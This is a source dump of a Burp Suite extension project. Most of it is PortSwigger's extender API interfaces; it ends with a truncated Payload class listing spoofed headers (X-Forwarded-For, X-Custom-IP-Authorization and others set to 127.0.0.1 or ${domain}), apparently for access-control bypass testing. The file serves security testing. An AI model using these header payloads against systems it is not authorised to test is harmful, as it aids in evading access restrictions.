byte getContentType(); 95 | } 96 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IResponseInfo.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IResponseInfo.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface is used to retrieve key details about an HTTP response. 16 | * Extensions can obtain an 17 | * IResponseInfo object for a given response by calling 18 | * IExtensionHelpers.analyzeResponse(). 19 | */ 20 | public interface IResponseInfo 21 | { 22 | /** 23 | * This method is used to obtain the HTTP headers contained in the response. 24 | * 25 | * @return The HTTP headers contained in the response. 26 | */ 27 | List getHeaders(); 28 | 29 | /** 30 | * This method is used to obtain the offset within the response where the 31 | * message body begins. 32 | * 33 | * @return The offset within the response where the message body begins. 34 | */ 35 | int getBodyOffset(); 36 | 37 | /** 38 | * This method is used to obtain the HTTP status code contained in the 39 | * response. 40 | * 41 | * @return The HTTP status code contained in the response. 42 | */ 43 | short getStatusCode(); 44 | 45 | /** 46 | * This method is used to obtain details of the HTTP cookies set in the 47 | * response. 48 | * 49 | * @return A list of ICookie objects representing the cookies 50 | * set in the response, if any. 51 | */ 52 | List getCookies(); 53 | 54 | /** 55 | * This method is used to obtain the MIME type of the response, as stated in 56 | * the HTTP headers. 57 | * 58 | * @return A textual label for the stated MIME type, or an empty String if 59 | * this is not known or recognized. The possible labels are the same as 60 | * those used in the main Burp UI. 61 | */ 62 | String getStatedMimeType(); 63 | 64 | /** 65 | * This method is used to obtain the MIME type of the response, as inferred 66 | * from the contents of the HTTP message body. 67 | * 68 | * @return A textual label for the inferred MIME type, or an empty String if 69 | * this is not known or recognized. The possible labels are the same as 70 | * those used in the main Burp UI. 71 | */ 72 | String getInferredMimeType(); 73 | } 74 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IResponseKeywords.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IResponseKeywords.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface is used to represent the counts of keywords appearing in a 16 | * number of HTTP responses. 17 | */ 18 | public interface IResponseKeywords 19 | { 20 | 21 | /** 22 | * This method is used to obtain the list of keywords whose counts vary 23 | * between the analyzed responses. 24 | * 25 | * @return The keywords whose counts vary between the analyzed responses. 26 | */ 27 | List getVariantKeywords(); 28 | 29 | /** 30 | * This method is used to obtain the list of keywords whose counts do not 31 | * vary between the analyzed responses. 32 | * 33 | * @return The keywords whose counts do not vary between the analyzed 34 | * responses. 35 | */ 36 | List getInvariantKeywords(); 37 | 38 | /** 39 | * This method is used to obtain the number of occurrences of an individual 40 | * keyword in a response. 41 | * 42 | * @param keyword The keyword whose count will be retrieved. 43 | * @param responseIndex The index of the response. Note responses are 44 | * indexed from zero in the order they were originally supplied to the 45 | * IExtensionHelpers.analyzeResponseKeywords() and 46 | * IResponseKeywords.updateWith() methods. 47 | * @return The number of occurrences of the specified keyword for the 48 | * specified response. 49 | */ 50 | int getKeywordCount(String keyword, int responseIndex); 51 | 52 | /** 53 | * This method is used to update the analysis based on additional responses. 54 | * 55 | * @param responses The new responses to include in the analysis. 56 | */ 57 | void updateWith(byte[]... responses); 58 | } 59 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IResponseVariations.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IResponseVariations.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface is used to represent variations between a number HTTP 16 | * responses, according to various attributes. 17 | */ 18 | public interface IResponseVariations 19 | { 20 | 21 | /** 22 | * This method is used to obtain the list of attributes that vary between 23 | * the analyzed responses. 24 | * 25 | * @return The attributes that vary between the analyzed responses. 26 | */ 27 | List getVariantAttributes(); 28 | 29 | /** 30 | * This method is used to obtain the list of attributes that do not vary 31 | * between the analyzed responses. 32 | * 33 | * @return The attributes that do not vary between the analyzed responses. 34 | */ 35 | List getInvariantAttributes(); 36 | 37 | /** 38 | * This method is used to obtain the value of an individual attribute in a 39 | * response. Note that the values of some attributes are intrinsically 40 | * meaningful (e.g. a word count) while the values of others are less so 41 | * (e.g. a checksum of the HTML tag names). 42 | * 43 | * @param attributeName The name of the attribute whose value will be 44 | * retrieved. Extension authors can obtain the list of supported attributes 45 | * by generating an IResponseVariations object for a single 46 | * response and calling 47 | * IResponseVariations.getInvariantAttributes(). 48 | * @param responseIndex The index of the response. Note that responses are 49 | * indexed from zero in the order they were originally supplied to the 50 | * IExtensionHelpers.analyzeResponseVariations() and 51 | * IResponseVariations.updateWith() methods. 52 | * @return The value of the specified attribute for the specified response. 53 | */ 54 | int getAttributeValue(String attributeName, int responseIndex); 55 | 56 | /** 57 | * This method is used to update the analysis based on additional responses. 58 | * 59 | * @param responses The new responses to include in the analysis. 60 | */ 61 | void updateWith(byte[]... responses); 62 | } 63 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IScanIssue.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScanIssue.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to retrieve details of Scanner issues. Extensions can 14 | * obtain details of issues by registering an IScannerListener or 15 | * by calling IBurpExtenderCallbacks.getScanIssues(). Extensions 16 | * can also add custom Scanner issues by registering an 17 | * IScannerCheck or calling 18 | * IBurpExtenderCallbacks.addScanIssue(), and providing their own 19 | * implementations of this interface. Note that issue descriptions and other 20 | * text generated by extensions are subject to an HTML whitelist that allows 21 | * only formatting tags and simple hyperlinks. 22 | */ 23 | public interface IScanIssue 24 | { 25 | 26 | /** 27 | * This method returns the URL for which the issue was generated. 28 | * 29 | * @return The URL for which the issue was generated. 30 | */ 31 | java.net.URL getUrl(); 32 | 33 | /** 34 | * This method returns the name of the issue type. 35 | * 36 | * @return The name of the issue type (e.g. "SQL injection"). 37 | */ 38 | String getIssueName(); 39 | 40 | /** 41 | * This method returns a numeric identifier of the issue type. See the Burp 42 | * Scanner documentation for a listing of all the issue types. 43 | * 44 | * @return A numeric identifier of the issue type. 45 | */ 46 | int getIssueType(); 47 | 48 | /** 49 | * This method returns the issue severity level. 50 | * 51 | * @return The issue severity level. Expected values are "High", "Medium", 52 | * "Low", "Information" or "False positive". 53 | * 54 | */ 55 | String getSeverity(); 56 | 57 | /** 58 | * This method returns the issue confidence level. 59 | * 60 | * @return The issue confidence level. Expected values are "Certain", "Firm" 61 | * or "Tentative". 62 | */ 63 | String getConfidence(); 64 | 65 | /** 66 | * This method returns a background description for this type of issue. 67 | * 68 | * @return A background description for this type of issue, or 69 | * null if none applies. A limited set of HTML tags may be 70 | * used. 71 | */ 72 | String getIssueBackground(); 73 | 74 | /** 75 | * This method returns a background description of the remediation for this 76 | * type of issue. 77 | * 78 | * @return A background description of the remediation for this type of 79 | * issue, or null if none applies. A limited set of HTML tags 80 | * may be used. 81 | */ 82 | String getRemediationBackground(); 83 | 84 | /** 85 | * This method returns detailed information about this specific instance of 86 | * the issue. 87 | * 88 | * @return Detailed information about this specific instance of the issue, 89 | * or null if none applies. A limited set of HTML tags may be 90 | * used. 91 | */ 92 | String getIssueDetail(); 93 | 94 | /** 95 | * This method returns detailed information about the remediation for this 96 | * specific instance of the issue. 97 | * 98 | * @return Detailed information about the remediation for this specific 99 | * instance of the issue, or null if none applies. A limited 100 | * set of HTML tags may be used. 101 | */ 102 | String getRemediationDetail(); 103 | 104 | /** 105 | * This method returns the HTTP messages on the basis of which the issue was 106 | * generated. 107 | * 108 | * @return The HTTP messages on the basis of which the issue was generated. 109 | * Note: The items in this array should be instances of 110 | * IHttpRequestResponseWithMarkers if applicable, so that 111 | * details of the relevant portions of the request and response messages are 112 | * available. 113 | */ 114 | IHttpRequestResponse[] getHttpMessages(); 115 | 116 | /** 117 | * This method returns the HTTP service for which the issue was generated. 118 | * 119 | * @return The HTTP service for which the issue was generated. 120 | */ 121 | IHttpService getHttpService(); 122 | 123 | } 124 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IScanQueueItem.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScanQueueItem.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to retrieve details of items in the Burp Scanner 14 | * active scan queue. Extensions can obtain references to scan queue items by 15 | * calling 16 | * IBurpExtenderCallbacks.doActiveScan(). 17 | */ 18 | public interface IScanQueueItem 19 | { 20 | /** 21 | * This method returns a description of the status of the scan queue item. 22 | * 23 | * @return A description of the status of the scan queue item. 24 | */ 25 | String getStatus(); 26 | 27 | /** 28 | * This method returns an indication of the percentage completed for the 29 | * scan queue item. 30 | * 31 | * @return An indication of the percentage completed for the scan queue 32 | * item. 33 | */ 34 | @Deprecated 35 | byte getPercentageComplete(); 36 | 37 | /** 38 | * This method returns the number of requests that have been made for the 39 | * scan queue item. 40 | * 41 | * @return The number of requests that have been made for the scan queue 42 | * item. 43 | */ 44 | int getNumRequests(); 45 | 46 | /** 47 | * This method returns the number of network errors that have occurred for 48 | * the scan queue item. 49 | * 50 | * @return The number of network errors that have occurred for the scan 51 | * queue item. 52 | */ 53 | int getNumErrors(); 54 | 55 | /** 56 | * This method returns the number of attack insertion points being used for 57 | * the scan queue item. 58 | * 59 | * @return The number of attack insertion points being used for the scan 60 | * queue item. 61 | */ 62 | int getNumInsertionPoints(); 63 | 64 | /** 65 | * This method allows the scan queue item to be canceled. 66 | */ 67 | void cancel(); 68 | 69 | /** 70 | * This method returns details of the issues generated for the scan queue 71 | * item. Note: different items within the scan queue may contain 72 | * duplicated versions of the same issues - for example, if the same request 73 | * has been scanned multiple times. Duplicated issues are consolidated in 74 | * the main view of scan results. Extensions can register an 75 | * IScannerListener to get details only of unique, newly 76 | * discovered Scanner issues post-consolidation. 77 | * 78 | * @return Details of the issues generated for the scan queue item. 79 | */ 80 | IScanIssue[] getIssues(); 81 | } 82 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IScannerCheck.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScannerCheck.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * Extensions can implement this interface and then call 16 | * IBurpExtenderCallbacks.registerScannerCheck() to register a 17 | * custom Scanner check. When performing scanning, Burp will ask the check to 18 | * perform active or passive scanning on the base request, and report any 19 | * Scanner issues that are identified. 20 | */ 21 | public interface IScannerCheck 22 | { 23 | 24 | /** 25 | * The Scanner invokes this method for each base request / response that is 26 | * passively scanned. Note: Extensions should only analyze the 27 | * HTTP messages provided during passive scanning, and should not make any 28 | * new HTTP requests of their own. 29 | * 30 | * @param baseRequestResponse The base HTTP request / response that should 31 | * be passively scanned. 32 | * @return A list of IScanIssue objects, or null 33 | * if no issues are identified. 34 | */ 35 | List doPassiveScan(IHttpRequestResponse baseRequestResponse); 36 | 37 | /** 38 | * The Scanner invokes this method for each insertion point that is actively 39 | * scanned. Extensions may issue HTTP requests as required to carry out 40 | * active scanning, and should use the 41 | * IScannerInsertionPoint object provided to build scan 42 | * requests for particular payloads. 43 | * Note: 44 | * Scan checks should submit raw non-encoded payloads to insertion points, 45 | * and the insertion point has responsibility for performing any data 46 | * encoding that is necessary given the nature and location of the insertion 47 | * point. 48 | * 49 | * @param baseRequestResponse The base HTTP request / response that should 50 | * be actively scanned. 51 | * @param insertionPoint An IScannerInsertionPoint object that 52 | * can be queried to obtain details of the insertion point being tested, and 53 | * can be used to build scan requests for particular payloads. 54 | * @return A list of IScanIssue objects, or null 55 | * if no issues are identified. 56 | */ 57 | List doActiveScan( 58 | IHttpRequestResponse baseRequestResponse, 59 | IScannerInsertionPoint insertionPoint); 60 | 61 | /** 62 | * The Scanner invokes this method when the custom Scanner check has 63 | * reported multiple issues for the same URL path. This can arise either 64 | * because there are multiple distinct vulnerabilities, or because the same 65 | * (or a similar) request has been scanned more than once. The custom check 66 | * should determine whether the issues are duplicates. In most cases, where 67 | * a check uses distinct issue names or descriptions for distinct issues, 68 | * the consolidation process will simply be a matter of comparing these 69 | * features for the two issues. 70 | * 71 | * @param existingIssue An issue that was previously reported by this 72 | * Scanner check. 73 | * @param newIssue An issue at the same URL path that has been newly 74 | * reported by this Scanner check. 75 | * @return An indication of which issue(s) should be reported in the main 76 | * Scanner results. The method should return -1 to report the 77 | * existing issue only, 0 to report both issues, and 78 | * 1 to report the new issue only. 79 | */ 80 | int consolidateDuplicateIssues( 81 | IScanIssue existingIssue, 82 | IScanIssue newIssue); 83 | } 84 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IScannerInsertionPoint.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScannerInsertionPoint.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to define an insertion point for use by active Scanner 14 | * checks. Extensions can obtain instances of this interface by registering an 15 | * IScannerCheck, or can create instances for use by Burp's own 16 | * scan checks by registering an 17 | * IScannerInsertionPointProvider. 18 | */ 19 | public interface IScannerInsertionPoint 20 | { 21 | 22 | /** 23 | * Used to indicate where the payload is inserted into the value of a URL 24 | * parameter. 25 | */ 26 | byte INS_PARAM_URL = 0x00; 27 | /** 28 | * Used to indicate where the payload is inserted into the value of a body 29 | * parameter. 30 | */ 31 | byte INS_PARAM_BODY = 0x01; 32 | /** 33 | * Used to indicate where the payload is inserted into the value of an HTTP 34 | * cookie. 35 | */ 36 | byte INS_PARAM_COOKIE = 0x02; 37 | /** 38 | * Used to indicate where the payload is inserted into the value of an item 39 | * of data within an XML data structure. 40 | */ 41 | byte INS_PARAM_XML = 0x03; 42 | /** 43 | * Used to indicate where the payload is inserted into the value of a tag 44 | * attribute within an XML structure. 45 | */ 46 | byte INS_PARAM_XML_ATTR = 0x04; 47 | /** 48 | * Used to indicate where the payload is inserted into the value of a 49 | * parameter attribute within a multi-part message body (such as the name of 50 | * an uploaded file). 51 | */ 52 | byte INS_PARAM_MULTIPART_ATTR = 0x05; 53 | /** 54 | * Used to indicate where the payload is inserted into the value of an item 55 | * of data within a JSON structure. 56 | */ 57 | byte INS_PARAM_JSON = 0x06; 58 | /** 59 | * Used to indicate where the payload is inserted into the value of an AMF 60 | * parameter. 61 | */ 62 | byte INS_PARAM_AMF = 0x07; 63 | /** 64 | * Used to indicate where the payload is inserted into the value of an HTTP 65 | * request header. 66 | */ 67 | byte INS_HEADER = 0x20; 68 | /** 69 | * Used to indicate where the payload is inserted into a URL path folder. 70 | */ 71 | byte INS_URL_PATH_FOLDER = 0x21; 72 | /** 73 | * Used to indicate where the payload is inserted into a URL path folder. 74 | * This is now deprecated; use INS_URL_PATH_FOLDER instead. 75 | */ 76 | @Deprecated 77 | byte INS_URL_PATH_REST = INS_URL_PATH_FOLDER; 78 | /** 79 | * Used to indicate where the payload is inserted into the name of an added 80 | * URL parameter. 81 | */ 82 | byte INS_PARAM_NAME_URL = 0x22; 83 | /** 84 | * Used to indicate where the payload is inserted into the name of an added 85 | * body parameter. 86 | */ 87 | byte INS_PARAM_NAME_BODY = 0x23; 88 | /** 89 | * Used to indicate where the payload is inserted into the body of the HTTP 90 | * request. 91 | */ 92 | byte INS_ENTIRE_BODY = 0x24; 93 | /** 94 | * Used to indicate where the payload is inserted into the URL path 95 | * filename. 96 | */ 97 | byte INS_URL_PATH_FILENAME = 0x25; 98 | /** 99 | * Used to indicate where the payload is inserted at a location manually 100 | * configured by the user. 101 | */ 102 | byte INS_USER_PROVIDED = 0x40; 103 | /** 104 | * Used to indicate where the insertion point is provided by an 105 | * extension-registered 106 | * IScannerInsertionPointProvider. 107 | */ 108 | byte INS_EXTENSION_PROVIDED = 0x41; 109 | /** 110 | * Used to indicate where the payload is inserted at an unknown location 111 | * within the request. 112 | */ 113 | byte INS_UNKNOWN = 0x7f; 114 | 115 | /** 116 | * This method returns the name of the insertion point. 117 | * 118 | * @return The name of the insertion point (for example, a description of a 119 | * particular request parameter). 120 | */ 121 | String getInsertionPointName(); 122 | 123 | /** 124 | * This method returns the base value for this insertion point. 125 | * 126 | * @return the base value that appears in this insertion point in the base 127 | * request being scanned, or null if there is no value in the 128 | * base request that corresponds to this insertion point. 129 | */ 130 | String getBaseValue(); 131 | 132 | /** 133 | * This method is used to build a request with the specified payload placed 134 | * into the insertion point. There is no requirement for extension-provided 135 | * insertion points to adjust the Content-Length header in requests if the 136 | * body length has changed, although Burp-provided insertion points will 137 | * always do this and will return a request with a valid Content-Length 138 | * header. 139 | * Note: 140 | * Scan checks should submit raw non-encoded payloads to insertion points, 141 | * and the insertion point has responsibility for performing any data 142 | * encoding that is necessary given the nature and location of the insertion 143 | * point. 144 | * 145 | * @param payload The payload that should be placed into the insertion 146 | * point. 147 | * @return The resulting request. 148 | */ 149 | byte[] buildRequest(byte[] payload); 150 | 151 | /** 152 | * This method is used to determine the offsets of the payload value within 153 | * the request, when it is placed into the insertion point. Scan checks may 154 | * invoke this method when reporting issues, so as to highlight the relevant 155 | * part of the request within the UI. 156 | * 157 | * @param payload The payload that should be placed into the insertion 158 | * point. 159 | * @return An int[2] array containing the start and end offsets of the 160 | * payload within the request, or null if this is not applicable (for 161 | * example, where the insertion point places a payload into a serialized 162 | * data structure, the raw payload may not literally appear anywhere within 163 | * the resulting request). 164 | */ 165 | int[] getPayloadOffsets(byte[] payload); 166 | 167 | /** 168 | * This method returns the type of the insertion point. 169 | * 170 | * @return The type of the insertion point. Available types are defined in 171 | * this interface. 172 | */ 173 | byte getInsertionPointType(); 174 | } 175 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IScannerInsertionPointProvider.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScannerInsertionPointProvider.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * Extensions can implement this interface and then call 16 | * IBurpExtenderCallbacks.registerScannerInsertionPointProvider() 17 | * to register a factory for custom Scanner insertion points. 18 | */ 19 | public interface IScannerInsertionPointProvider 20 | { 21 | /** 22 | * When a request is actively scanned, the Scanner will invoke this method, 23 | * and the provider should provide a list of custom insertion points that 24 | * will be used in the scan. Note: these insertion points are used in 25 | * addition to those that are derived from Burp Scanner's configuration, and 26 | * those provided by any other Burp extensions. 27 | * 28 | * @param baseRequestResponse The base request that will be actively 29 | * scanned. 30 | * @return A list of 31 | * IScannerInsertionPoint objects that should be used in the 32 | * scanning, or 33 | * null if no custom insertion points are applicable for this 34 | * request. 35 | */ 36 | List getInsertionPoints( 37 | IHttpRequestResponse baseRequestResponse); 38 | } 39 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IScannerListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScannerListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerScannerListener() to register a 15 | * Scanner listener. The listener will be notified of new issues that are 16 | * reported by the Scanner tool. Extensions can perform custom analysis or 17 | * logging of Scanner issues by registering a Scanner listener. 18 | */ 19 | public interface IScannerListener 20 | { 21 | /** 22 | * This method is invoked when a new issue is added to Burp Scanner's 23 | * results. 24 | * 25 | * @param issue An 26 | * IScanIssue object that the extension can query to obtain 27 | * details about the new issue. 28 | */ 29 | void newScanIssue(IScanIssue issue); 30 | } 31 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IScopeChangeListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScopeChangeListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerScopeChangeListener() to register 15 | * a scope change listener. The listener will be notified whenever a change 16 | * occurs to Burp's suite-wide target scope. 17 | */ 18 | public interface IScopeChangeListener 19 | { 20 | /** 21 | * This method is invoked whenever a change occurs to Burp's suite-wide 22 | * target scope. 23 | */ 24 | void scopeChanged(); 25 | } 26 | -------------------------------------------------------------------------------- /burpdemo/src/burp/ISessionHandlingAction.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ISessionHandlingAction.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerSessionHandlingAction() to 15 | * register a custom session handling action. Each registered action will be 16 | * available within the session handling rule UI for the user to select as a 17 | * rule action. Users can choose to invoke an action directly in its own right, 18 | * or following execution of a macro. 19 | */ 20 | public interface ISessionHandlingAction 21 | { 22 | /** 23 | * This method is used by Burp to obtain the name of the session handling 24 | * action. This will be displayed as an option within the session handling 25 | * rule editor when the user selects to execute an extension-provided 26 | * action. 27 | * 28 | * @return The name of the action. 29 | */ 30 | String getActionName(); 31 | 32 | /** 33 | * This method is invoked when the session handling action should be 34 | * executed. This may happen as an action in its own right, or as a 35 | * sub-action following execution of a macro. 36 | * 37 | * @param currentRequest The base request that is currently being processed. 38 | * The action can query this object to obtain details about the base 39 | * request. It can issue additional requests of its own if necessary, and 40 | * can use the setter methods on this object to update the base request. 41 | * @param macroItems If the action is invoked following execution of a 42 | * macro, this parameter contains the result of executing the macro. 43 | * Otherwise, it is 44 | * null. Actions can use the details of the macro items to 45 | * perform custom analysis of the macro to derive values of non-standard 46 | * session handling tokens, etc. 47 | */ 48 | void performAction( 49 | IHttpRequestResponse currentRequest, 50 | IHttpRequestResponse[] macroItems); 51 | } 52 | -------------------------------------------------------------------------------- /burpdemo/src/burp/ITab.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ITab.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * This interface is used to provide Burp with details of a custom tab that will 16 | * be added to Burp's UI, using a method such as 17 | * IBurpExtenderCallbacks.addSuiteTab(). 18 | */ 19 | public interface ITab 20 | { 21 | /** 22 | * Burp uses this method to obtain the caption that should appear on the 23 | * custom tab when it is displayed. 24 | * 25 | * @return The caption that should appear on the custom tab when it is 26 | * displayed. 27 | */ 28 | String getTabCaption(); 29 | 30 | /** 31 | * Burp uses this method to obtain the component that should be used as the 32 | * contents of the custom tab when it is displayed. 33 | * 34 | * @return The component that should be used as the contents of the custom 35 | * tab when it is displayed. 36 | */ 37 | Component getUiComponent(); 38 | } 39 | -------------------------------------------------------------------------------- /burpdemo/src/burp/ITempFile.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ITempFile.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to hold details of a temporary file that has been 14 | * created via a call to 15 | * IBurpExtenderCallbacks.saveToTempFile(). 16 | * 17 | */ 18 | public interface ITempFile 19 | { 20 | /** 21 | * This method is used to retrieve the contents of the buffer that was saved 22 | * in the temporary file. 23 | * 24 | * @return The contents of the buffer that was saved in the temporary file. 25 | */ 26 | byte[] getBuffer(); 27 | 28 | /** 29 | * This method is deprecated and no longer performs any action. 30 | */ 31 | @Deprecated 32 | void delete(); 33 | } 34 | -------------------------------------------------------------------------------- /burpdemo/src/burp/ITextEditor.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ITextEditor.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * This interface is used to provide extensions with an instance of Burp's raw 16 | * text editor, for the extension to use in its own UI. Extensions should call 17 | * IBurpExtenderCallbacks.createTextEditor() to obtain an instance 18 | * of this interface. 19 | */ 20 | public interface ITextEditor 21 | { 22 | /** 23 | * This method returns the UI component of the editor, for extensions to add 24 | * to their own UI. 25 | * 26 | * @return The UI component of the editor. 27 | */ 28 | Component getComponent(); 29 | 30 | /** 31 | * This method is used to control whether the editor is currently editable. 32 | * This status can be toggled on and off as required. 33 | * 34 | * @param editable Indicates whether the editor should be currently 35 | * editable. 36 | */ 37 | void setEditable(boolean editable); 38 | 39 | /** 40 | * This method is used to update the currently displayed text in the editor. 41 | * 42 | * @param text The text to be displayed. 43 | */ 44 | void setText(byte[] text); 45 | 46 | /** 47 | * This method is used to retrieve the currently displayed text. 48 | * 49 | * @return The currently displayed text. 50 | */ 51 | byte[] getText(); 52 | 53 | /** 54 | * This method is used to determine whether the user has modified the 55 | * contents of the editor. 56 | * 57 | * @return An indication of whether the user has modified the contents of 58 | * the editor since the last call to 59 | * setText(). 60 | */ 61 | boolean isTextModified(); 62 | 63 | /** 64 | * This method is used to obtain the currently selected text. 65 | * 66 | * @return The currently selected text, or 67 | * null if the user has not made any selection. 68 | */ 69 | byte[] getSelectedText(); 70 | 71 | /** 72 | * This method can be used to retrieve the bounds of the user's selection 73 | * into the displayed text, if applicable. 74 | * 75 | * @return An int[2] array containing the start and end offsets of the 76 | * user's selection within the displayed text. If the user has not made any 77 | * selection in the current message, both offsets indicate the position of 78 | * the caret within the editor. 79 | */ 80 | int[] getSelectionBounds(); 81 | 82 | /** 83 | * This method is used to update the search expression that is shown in the 84 | * search bar below the editor. The editor will automatically highlight any 85 | * regions of the displayed text that match the search expression. 86 | * 87 | * @param expression The search expression. 88 | */ 89 | void setSearchExpression(String expression); 90 | } 91 | -------------------------------------------------------------------------------- /burpdemo/src/burp/Payload.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | import java.io.UnsupportedEncodingException; 4 | import java.net.MalformedURLException; 5 | import java.net.URL; 6 | import java.net.URLEncoder; 7 | import java.util.HashMap; 8 | import java.util.Iterator; 9 | import java.util.Map; 10 | 11 | /** 12 | * @auther Skay 13 | * @date 2022/1/7 16:09 14 | * @description 15 | */ 16 | public class Payload { 17 | public HashMap HeaderPayload = new HashMap<>(); 18 | public HashMap ProtocolPayload = new HashMap<>(); 19 | public HashMap PortPayload = new HashMap<>(); 20 | public HashMap MethodPayload = new HashMap<>(); 21 | public HashMap EncodePayload = new HashMap<>(); 22 | public HashMap MiscPayload = new HashMap<>(); 23 | 24 | Payload(){ 25 | this.HeaderPayload.put("X-Originally-Forwarded-For","X-Originally-Forwarded-For: 127.0.0.1"); 26 | this.HeaderPayload.put("X-Originating-IP","X-Originating-IP: 127.0.0.1"); 27 | this.HeaderPayload.put("True-Client-IP","True-Client-IP: 127.0.0.1"); 28 | this.HeaderPayload.put("X-WAP-Profile","X-WAP-Profile: 127.0.0.1"); 29 | this.HeaderPayload.put("Profile","Profile: http://${domain}"); 30 | this.HeaderPayload.put("X-Arbitrary","X-Arbitrary: http://${domain}"); 31 | this.HeaderPayload.put("X-HTTP-DestinationURL","X-HTTP-DestinationURL: http://${domain}"); 32 | this.HeaderPayload.put("X-Forwarded-Proto","X-Forwarded-Proto: http://${domain}"); 33 | this.HeaderPayload.put("Destination","Destination: 127.0.0.1"); 34 | this.HeaderPayload.put("Proxy","Proxy: 127.0.0.1"); 35 | this.HeaderPayload.put("CF-Connecting_IP","CF-Connecting_IP: 127.0.0.1"); 36 | this.HeaderPayload.put("Referer","Referer: ${domain}"); 37 | this.HeaderPayload.put("X-Custom-IP-Authorization","X-Custom-IP-Authorization: 127.0.0.1"); 38 | this.HeaderPayload.put("X-Originating-IP","X-Originating-IP: 127.0.0.1"); 39 | this.HeaderPayload.put("X-Forwarded-For","X-Forwarded-For: 